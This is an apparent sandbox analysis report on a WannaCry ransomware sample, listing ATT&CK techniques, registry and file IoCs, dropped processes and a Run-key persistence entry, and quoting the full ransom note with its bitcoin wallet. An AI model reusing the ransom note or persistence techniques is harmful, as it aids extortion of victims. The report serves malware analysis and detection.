wannacry | hxxp://skycheat

Resubmissions

21-09-2024 18:47

240921-xfla3axdqb 10

19-08-2024 02:21

240819-cs88faseqk 10

Analysis

max time kernel
1602s
max time network
1603s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
19-08-2024 02:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://skycheat

Score

10^/10

wannacry defense_evasion discovery evasion execution impact motw persistence phishing privilege_escalation ransomware spyware stealer trojan worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0"	MicrosoftEdgeUpdate.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD225E.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD2265.tmp	WannaCry.EXE

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
5036	taskdl.exe
4160	@[email protected]
2980	@[email protected]
2400	taskhsvc.exe
336	taskdl.exe
5948	taskse.exe
3008	@[email protected]
5136	taskdl.exe
1888	taskse.exe
2800	@[email protected]
3760	taskse.exe
2892	@[email protected]
2700	taskdl.exe
4200	taskse.exe
1856	@[email protected]
932	taskdl.exe
2840	taskse.exe
1696	@[email protected]
3172	taskdl.exe
5132	taskse.exe
4068	@[email protected]
1116	taskdl.exe
3632	taskse.exe
572	@[email protected]
1044	taskdl.exe
2096	taskse.exe
228	@[email protected]
5956	taskdl.exe
4324	taskse.exe
2664	@[email protected]
5404	taskdl.exe
4808	taskse.exe
3020	@[email protected]
1508	taskdl.exe
1232	taskse.exe
980	@[email protected]
2664	taskdl.exe
4892	JJSploit_Installer.exe
4392	JJS-UI.exe
2972	JJS-UI.exe
2540	JJS-UI.exe
3340	JJS-UI.exe
5904	taskse.exe
3624	@[email protected]
5084	taskdl.exe
6828	RobloxPlayerInstaller.exe
6156	taskse.exe
6304	@[email protected]
6308	taskdl.exe
2756	MicrosoftEdgeWebview2Setup.exe
2676	MicrosoftEdgeUpdate.exe
4808	MicrosoftEdgeUpdate.exe
3780	MicrosoftEdgeUpdate.exe
2040	MicrosoftEdgeUpdateComRegisterShell64.exe
6052	MicrosoftEdgeUpdateComRegisterShell64.exe
1064	MicrosoftEdgeUpdateComRegisterShell64.exe
6452	MicrosoftEdgeUpdate.exe
5140	MicrosoftEdgeUpdate.exe
6544	MicrosoftEdgeUpdate.exe
6584	MicrosoftEdgeUpdate.exe
6548	taskse.exe
6764	@[email protected]
2368	taskdl.exe
6156	MicrosoftEdge_X64_127.0.2651.105.exe

Loads dropped DLL 51 IoCs

pid	Process
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4392	JJS-UI.exe
4392	JJS-UI.exe
2972	JJS-UI.exe
2540	JJS-UI.exe
2972	JJS-UI.exe
2972	JJS-UI.exe
2972	JJS-UI.exe
3340	JJS-UI.exe
2676	MicrosoftEdgeUpdate.exe
4808	MicrosoftEdgeUpdate.exe
3780	MicrosoftEdgeUpdate.exe
2040	MicrosoftEdgeUpdateComRegisterShell64.exe
3780	MicrosoftEdgeUpdate.exe
6052	MicrosoftEdgeUpdateComRegisterShell64.exe
3780	MicrosoftEdgeUpdate.exe
1064	MicrosoftEdgeUpdateComRegisterShell64.exe
3780	MicrosoftEdgeUpdate.exe
6452	MicrosoftEdgeUpdate.exe
5140	MicrosoftEdgeUpdate.exe
6544	MicrosoftEdgeUpdate.exe
6544	MicrosoftEdgeUpdate.exe
5140	MicrosoftEdgeUpdate.exe
6584	MicrosoftEdgeUpdate.exe
1012	JJS-UI.exe
3020	MicrosoftEdgeUpdate.exe
3336	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
4012	RobloxPlayerBeta.exe
2120	RobloxPlayerBeta.exe
5924	MicrosoftEdgeUpdate.exe
6832	MicrosoftEdgeUpdate.exe
6832	MicrosoftEdgeUpdate.exe
5924	MicrosoftEdgeUpdate.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
660	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mnmgcwodykunqun973 = "\"C:\\Users\\Admin\\Downloads\\WannaCry-main\\WannaCry-main\\tasksche.exe\""	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerInstaller.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerInstaller.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
674	raw.githubusercontent.com
681	raw.githubusercontent.com
723	raw.githubusercontent.com
901	raw.githubusercontent.com
684	raw.githubusercontent.com
764	raw.githubusercontent.com
915	raw.githubusercontent.com
843	raw.githubusercontent.com
894	raw.githubusercontent.com
911	raw.githubusercontent.com
917	raw.githubusercontent.com
671	raw.githubusercontent.com
738	raw.githubusercontent.com
814	raw.githubusercontent.com
833	raw.githubusercontent.com
889	raw.githubusercontent.com
653	raw.githubusercontent.com
696	raw.githubusercontent.com
741	raw.githubusercontent.com
886	raw.githubusercontent.com
809	raw.githubusercontent.com
896	raw.githubusercontent.com
898	raw.githubusercontent.com
905	raw.githubusercontent.com
698	raw.githubusercontent.com
715	raw.githubusercontent.com
736	raw.githubusercontent.com
799	raw.githubusercontent.com
721	raw.githubusercontent.com
805	raw.githubusercontent.com
826	raw.githubusercontent.com
907	raw.githubusercontent.com
730	raw.githubusercontent.com
745	raw.githubusercontent.com
759	raw.githubusercontent.com
882	raw.githubusercontent.com
909	raw.githubusercontent.com
51	camo.githubusercontent.com
762	raw.githubusercontent.com
870	raw.githubusercontent.com
891	raw.githubusercontent.com
831	raw.githubusercontent.com
836	raw.githubusercontent.com
849	raw.githubusercontent.com
852	raw.githubusercontent.com
816	raw.githubusercontent.com
846	raw.githubusercontent.com
702	raw.githubusercontent.com
734	raw.githubusercontent.com
470	raw.githubusercontent.com
839	raw.githubusercontent.com
858	raw.githubusercontent.com
903	raw.githubusercontent.com
677	raw.githubusercontent.com
725	raw.githubusercontent.com
704	raw.githubusercontent.com
706	raw.githubusercontent.com
719	raw.githubusercontent.com
807	raw.githubusercontent.com
819	raw.githubusercontent.com
821	raw.githubusercontent.com
854	raw.githubusercontent.com
872	raw.githubusercontent.com
133	camo.githubusercontent.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
396	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Checks system information in the registry 2 TTPs 12 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Suspicious use of NtCreateThreadExHideFromDebugger 6 IoCs

pid	Process
3336	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
4012	RobloxPlayerBeta.exe
2120	RobloxPlayerBeta.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
3336	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AnimationEditor\btn_clearText.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\InspectMenu\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\Controls\DesignSystem\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\CloseButton.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\graphic\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Chat\ChatDownFlip.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaApp\icons\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EU6B1C.tmp\msedgeupdateres_fi.dll	MicrosoftEdgeWebview2Setup.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaApp\icons\ic-ROBUX.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AnimationEditor\icon_warning.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\TerrainTools\import_toggleOn.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\StudioToolbox\Voting\thumbs-down-filled.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\VoiceChat\SpeakerNew\Unmuted0.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\avatar\defaultPants.rbxm	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\TerrainTools\sliderbar_button.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\PlayerList\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\127.0.2651.105\identity_proxy\win10\identity_helper.Sparse.Canary.msix	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\BottomRoundedRect8px.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Menu\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\icons\ic-checkbox-on [email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\9-slice\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AnimationEditor\icon_hierarchy_end_white.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Controls\DesignSystem\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AvatarEditorImages\Stretch\bar-empty-mid.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\Controls\DesignSystem\ButtonControls.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\advClosed-hand-anchored.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\Controls\DesignSystem\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EU6B1C.tmp\msedgeupdateres_bn.dll	MicrosoftEdgeWebview2Setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AlignTool\button_min_24.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\LuaPackages\Packages\_Index\UIBlox\UIBlox\AppImageAtlas\img_set_3x_12.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Controls\xboxLSDirectional.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Emotes\Large\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\Debugger\Watch-Window.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\VoiceChat\MicDark\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Emotes\Editor\TenFoot\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\127.0.2651.105\resources.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\VoiceChat\SpeakerLight\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\PlatformContent\pc\textures\water\normal_12.dds	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Menu\hoverPopupMid.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\models\LivePackages\.placeholder	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaApp\ExternalSite\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\9-slice\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\Controls\DesignSystem\Thumbstick2Horizontal.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\InspectMenu\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\graphic\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\avatar\heads\headL.mesh	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\StudioUIEditor\icon_rotate6.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Scroll\scroll-middle.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\LuaPackages\Packages\_Index\UIBlox\UIBlox\AppImageAtlas\img_set_3x_7.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\MaterialManager\Gradient_LT.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Controls\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\graphic\gr-profile-border-48x48.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Chat\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\VirtualCursor\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\VR\circleWhite.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Controls\DesignSystem\ButtonL2.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\Debugger\Breakpoints\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\127.0.2651.105\Trust Protection Lists\Sigma\Advertising	setup.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AnimationEditor\button_lock.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\AnimationEditor\icon_add.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\TerrainTools\mtrl_mud.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\ExtraContent\textures\ui\LuaChat\9-slice\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\DeveloperFramework\close.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\content\textures\ui\Controls\DesignSystem\[email protected]	RobloxPlayerInstaller.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat	setup.exe
File created	C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat	setup.exe
File created	C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp\MsEdgeCrashpad\metadata	setup.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\JJSploit_Installer.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5532	2980	WerFault.exe	164
1604	2980	WerFault.exe	164

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RobloxPlayerInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJSploit_Installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJS-UI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
